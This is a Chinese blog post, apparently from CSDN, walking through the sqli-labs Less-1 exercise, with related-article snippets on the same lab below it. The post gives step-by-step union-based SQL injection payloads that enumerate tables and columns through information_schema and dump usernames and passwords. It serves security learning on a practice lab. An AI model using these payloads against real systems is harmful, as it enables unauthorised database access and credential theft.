sqli-lab刷题Less-1

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量208 收藏 1
点赞数 1
分类专栏: sqli-lab刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MichealCurry1/article/details/120617337
版权

SQL注入 Web安全 联合查询 information_schema 盲注
关键词由CSDN通过智能技术生成

标题 sqli-lab刷题Less-1

本人是一名小白,刚开始进行web学习。
打开sqli-lib的Less-1,观察其页面。
在这里插入图片描述可以看到,其页面提示输入id值,在url输入?id=1,提交id=1的参数,并且结合其给的提示,探测出其为单引号型的sql注入
在这里插入图片描述
之后拼接sql语句,在url输入?id=1’ order by 4 --+,order by会对列名称进行排序,多次试验发现为4时候报错,3不报错,证明该表名有3个字段
在这里插入图片描述
之后使用联合查询语句探测注入点:?id=1’ and 1=2 union select 1,2,3 --+
其中select 1,2,3语句含义为不筛选什么,返回1,2,3,union会将两次搜索的结果合并起来,但是union前面语句结果为False,因此不合并
在这里插入图片描述
由此可知字段2,字段3会被显示出来,由此可以爆破出数据库名等等。

首先要记住三个函数:
database():当前网站使用的数据库
version():当前mysql的版本
user():当前mysql的用户

先爆出数据库,查看其版本
?id=1’ and 1=2 union select 1,version(),database() --+
在这里插入图片描述
在mysql 5.0以上的版本中,为了方便管理,默认定义了information_schema数据库,用来存储数据库元信息,其中具有表schemata(数据库名),tables(表民),columns(列名或字段名)。
1.在schemata表中,schema_name字段用来存储数据库名。
2.在tables表中,table_schema和table_name分别用来存储数据库名和表名。
3.在columns表中,table_schema(数据库名),table_name(表名),column_name(字段名)。

输入语句:
?id=1’ and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
爆出当前数据库下表名。
其中group_concat是针对列做的数据拼接,且group_concat自动生成逗号。
在这里插入图片描述
之后要获取字段值
输入?id=1’ and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ --+
盲猜用户名密码在users表中

在这里插入图片描述
猜测用户名在username字段,密码在password字段
输入?id=1’ and 1=2 union select 1,group_concat(username),group_concat(password) from users --+
爆出用户名和密码

在这里插入图片描述

fippyFish
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli less1
klxxxxxx的博客
10-23 2664
sqli-labs less-1 前言 鄙人不才,只是把平时学习的笔记整理下来,仅供参考,望大家指点。 首先我们需要了解,什么是sql注入? SQL注入是比较常见的网络攻击方式,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写代码时的疏忽,导致他人可以通过操作输入来修改后台SQL语句达到代码执行,进行攻击的后果 注入手法的分类 注入手法可以分为: 联合查询注入、报错型注入、布尔型注入、延时注入、堆叠注入 从数据类型可以分为: 字符型、数值型 从注入位置可以分类为: GET数据(提交数据的方式为G
sqli-labs Less-1
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-30 268
sqli-labs Less-11.字符型SQL注入的关键是单引号的闭合2.MySQL数据库对于单引号的规则如下:3.如何判断是否是字符型注入4.猜字段数方法一:方法二:4.使用联合查询查看页面是否有显示位5.爆出数据库版本和当前数据库名6.爆出所有数据库7.爆出当前数据库所有表8.查询当前数据库users表所有字段9.查询数据 MySQL中的information_schema数据库表说明: ...
sqli less-01
ANYOUZHEN的博客
04-29 1321
我们试着输入id=1,查看是否有回显 接着输入id=1',发现出现报错 构造payload查询列表,?id=1' order by 3--+ 当我们输入?id=1' order by 4--+时出现了unknown,说明列表为3 接下来我们使用联合查询,?id=-1' union select 1,2,3--+; 然后发现2,3列有回应,说明可以爆破出数据库,列,用户和密码 接下来我们查询数据库,http://127.0.0.1/sqli/Less-1/?id=-1' union
Sqli-Labs之less-1
ISNS的博客
02-03 1780
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
sql注入 sql-lib Less-1
weixin_43745072的博客
11-20 278
less 1 寻找溢出点,判断注入类型 输入为1,显示正常 ?id=1 输入为1’,显示异常,并且输入为2-1,显示的是id=2的内容,初步判断是字符型注入。同时从报错的到数据库mysql。 ?id=1' 注释引号,可以正常显示 ?id=1'# 判断有多少列,3不报错,4报错 ?id=-1' order by 3 # ?id=-1' order by 4 # 判断显示位,可以知道显示位是第2,3位 ?id=-1' union select 1,2,3 # 我们使
SQLi-less-1
morningstar929的博客
09-07 166
1.判断字符型还是整型注入 http://127.0.0.1/sqli/Less-1/?id=1 正常 http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 与上述一样 http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 与上述一样 由此可以判断不是整型注入 http://127.0.0.1/sqli/Less-1/?id=1%27%20and%201=1%20–+ 与上述一样 http://127.0.0.1/sqli/Less-1/?id
sqli-labs Less-1~Less-2
weixin_47387913的博客
03-22 170
Sqli-labs靶场练习 来了来了,sql注入练习,这将会是很长的一段路。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1819
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1387
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-Less1
qq_44060093的博客
04-19 529
最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
Sqli-Labs:Less-1
weixin_44227437的博客
05-04 355
sqli-1 基于错误_GET_单引号_字符型注入 0x01:判断是字符型注入还是数字型注入
sqli-labs less-1
zbbjya的博客
02-08 456
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
SQLI-Lab】-Less1
xinyue9966的博客
01-20 231
SQLI-Less1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)前言一、GET单引号字符型注入二、步骤总结 前言 一、GET单引号字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 http://192.168.135.149/sqli/Less-1/?id=1' and 1=1 -
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1926
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1312
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
sql-libs——less1
bronze_s的博客
10-11 395
打开第一关发现没有任何参数, 根据提示“请输入ID作为带有数字值的参数”构造url,正常显示。 加’ 判断有无注入,执行后报错,可判断为数字型注入 ...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值